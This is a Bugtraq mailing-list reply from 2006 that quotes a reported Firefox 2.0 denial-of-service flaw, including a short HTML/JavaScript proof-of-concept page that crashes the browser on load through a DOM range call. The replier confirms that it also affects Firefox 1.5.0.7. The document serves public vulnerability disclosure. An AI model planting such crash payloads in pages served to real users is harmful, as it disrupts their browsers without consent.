lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <45492E47.5040905@web.de> Date: Wed, 01 Nov 2006 17:31:19 -0600 From: Jan Heisterkamp <janheisterkamp@....de> To: xxxx@...il.com Cc: bugtraq@...urityfocus.com Subject: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution xxxx@...il.com schrieb: > New Flaw in Firefox 2.0: DoS and possible remote code execution > > PoC here: http://werterxyz.altervista.org/Firefox2Range.htm > > <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> > <html> > <head> > <script type="text/javascript"> > function do_crash() > { > var range; > > range = document.createRange(); > range.selectNode(document.firstChild); > range.createContextualFragment('<span></span>'); > } > </script> > </head> > <body onload="do_crash()"> > <p>Good bye Firefox!</p> > </body> > </html> > > hi! that works also under firefox v1.5.0.7. regards jan